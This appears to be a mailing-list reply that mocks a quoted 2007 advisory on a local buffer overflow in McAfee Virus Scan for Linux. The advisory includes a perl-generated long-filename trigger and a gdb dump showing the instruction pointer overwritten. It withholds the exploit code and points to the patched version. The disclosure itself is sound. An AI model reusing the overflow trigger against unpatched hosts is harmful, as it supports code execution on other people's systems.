Where does security come into play here? This is a local crash in a non setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario?
J P.S. We all know this advisory is bullshit, you should have sold it to WabiSabiLabi LOLOLOL On Wed, 15 Aug 2007 08:56:54 -0400 Sebastian Wolfgarten <[EMAIL PROTECTED]> wrote: >I - TITLE > >Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 >Local >Buffer Overflow > >II - SUMMARY > >Description: Local buffer overflow vulnerability in McAfee Virus >Scan >for Linux and Unix allows arbitrary code execution > >Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com) > >Date: August 15th, 2007 > >Severity: Low-Medium > >References: http://www.devtarget.org/mcafee-advisory-08-2007.txt > >III - OVERVIEW > >McAfee Virus Scan for Linux and Unix is a command-line version of >the >popular McAfee anti-virus scanner running on the Linux operating >system >as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was >discovered that the product is prone to a classic buffer overflow >vulnerability when attempting to scan files or directories with a >particularly long name. This vulnerability results in the local >execution of arbitrary code with the privileges of the user >running the >scanner, privilege escalation is by default not possible. Remote >exploitation appears to be infeasible due to file length >limitations in >popular file systems. > >IV - DETAILS > >The overflow occurs when the product tries to scan a file or >directory >with a name that is longer than a certain size (approx. 4124+ >bytes). >For example on a Debian Linux 3.1 test system, it takes 4124+4 >bytes to >successfully overwrite the EIP register and thus execute arbitrary >code: > ># /usr/local/uvscan/uvscan --version >Virus Scan for Linux v5.10.0 >Copyright (c) 1992-2006 McAfee, Inc. All rights reserved. >(408) 988-3832 EVALUATION COPY - May 26 2006 > >Scan engine v5.1.00 for Linux. >Virus data file v4777 created Jun 05 2006 >Scanning for 194376 viruses, trojans and variants. > ># gdb /usr/local/uvscan/uvscan >GNU gdb 6.3-debian >Copyright 2004 Free Software Foundation, Inc. >GDB is free software, covered by the GNU General Public License, >and you >are welcome to change it and/or distribute copies of it under >certain >conditions. Type "show copying" to see the conditions. There is >absolutely no warranty for GDB. Type "show warranty" for details. >This >GDB was configured as "i386-linux"...(no debugging symbols found) >Using host libthread_db library "/lib/tls/libthread_db.so.1". > >(gdb) run `perl -e 'print "A"x4124 . "B"x4'` >Starting program: /usr/local/uvscan/uvscan `perl -e 'print >"A"x4124 . >"B"x4'` >(no debugging symbols found) >(no debugging symbols found) >(no debugging symbols found) >(no debugging symbols found) >(no debugging symbols found) >(no debugging symbols found) >(no debugging symbols found) >(no debugging symbols found) >(no debugging symbols found) >[Thread debugging using libthread_db enabled] >[New Thread 1080238208 (LWP 2461)] >(no debugging symbols found) > >Program received signal SIGSEGV, Segmentation fault. >[Switching to Thread 1080238208 (LWP 2461)] >0x42424242 in ?? () >(gdb) info registers >eax 0x1 1 >ecx 0x8068430 134644784 >edx 0x1 1 >ebx 0x41414141 1094795585 >esp 0xbfffdc40 0xbfffdc40 >ebp 0x41414141 0x41414141 >esi 0x41414141 1094795585 >edi 0x41414141 1094795585 >eip 0x42424242 0x42424242 >eflags 0x282 642 >cs 0x73 115 >ss 0x7b 123 >ds 0x7b 123 >es 0x7b 123 >fs 0x0 0 >gs 0x33 51 > >V - EXPLOIT CODE > >An exploit for this vulnerability has been developed but will not >released to the general public at this time. > >VI - WORKAROUND/FIX > >To address this problem, the vendor has released McAfee VirusScan >Command Line Scanner for Linux and Unix version 5.20. Thus all >users of >the product are asked to test and install this patch as soon as >possible. McAfee has also published a dedicated security bulletin >that >covers the problem (see >https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=61 >3576&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=613 >576). > > >VII - DISCLOSURE TIMELINE > >18. December 2006 - Notified [EMAIL PROTECTED] >19. December 2006 - Vendor responded that vulnerability is being >investigated >19. December to 15. August 2007 - Weekly vendor report on the >progress >of the development of the patch >01. August 2007 - Release of patch >15. August 2007 - Public disclosure -- Click to become a master chef, own a restaurant and make millions. http://tagline.hushmail.com/fc/Ioyw6h4eAFZexjoyRjzeiNugNCYHByYgDcZbE142fg5zU8vki64fmI/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/